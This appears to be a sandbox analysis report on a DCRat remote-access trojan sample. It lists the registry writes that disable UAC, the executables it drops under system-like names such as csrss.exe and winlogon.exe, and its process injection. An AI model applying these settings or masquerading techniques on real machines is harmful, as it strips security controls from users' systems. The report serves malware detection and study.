Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Mozilla Firefox\fonts\Registry.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2908 set thread context of 3692 N/A C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe
PID 820 set thread context of 684 N/A C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp4AE.tmp.exe
PID 4224 set thread context of 2128 N/A C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp2342.tmp.exe
PID 4472 set thread context of 2056 N/A C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp410B.tmp.exe
PID 3276 set thread context of 4228 N/A C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp5EC5.tmp.exe
PID 1072 set thread context of 4704 N/A C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp7D49.tmp.exe
PID 740 set thread context of 4336 N/A C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpB10B.tmp.exe
PID 5044 set thread context of 3920 N/A C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpD116.tmp.exe
PID 4292 set thread context of 4200 N/A C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp313.tmp.exe
PID 4276 set thread context of 4492 N/A C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp354F.tmp.exe
PID 636 set thread context of 3360 N/A C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe
PID 4456 set thread context of 2388 N/A C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe
PID 452 set thread context of 2500 N/A C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Defender\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Common Files\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\fonts\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\RCXCCF0.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\RCXB99E.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Common Files\RCXC6C4.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Multimedia Platform\ee2ad38f3d4382 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCXBDD7.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\RCXD5DD.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Windows Defender\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\SearchApp.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\defaults\RCXDC87.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\38384e6a620884 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\38384e6a620884 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Common Files\5b884080fd4f94 C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Common Files\fontdrvhost.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Program Files\Mozilla Firefox\fonts\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\fonts\RCXD1B5.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Program Files (x86)\Windows Multimedia Platform\Registry.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\ShellExperiences\RCXC4B0.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\TAPI\RCXD3C9.tmp C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File opened for modification C:\Windows\TAPI\csrss.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
File created C:\Windows\es-ES\winlogon.exe C:\Users\Admin\AppData\Local\Temp\4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14.exe N/A
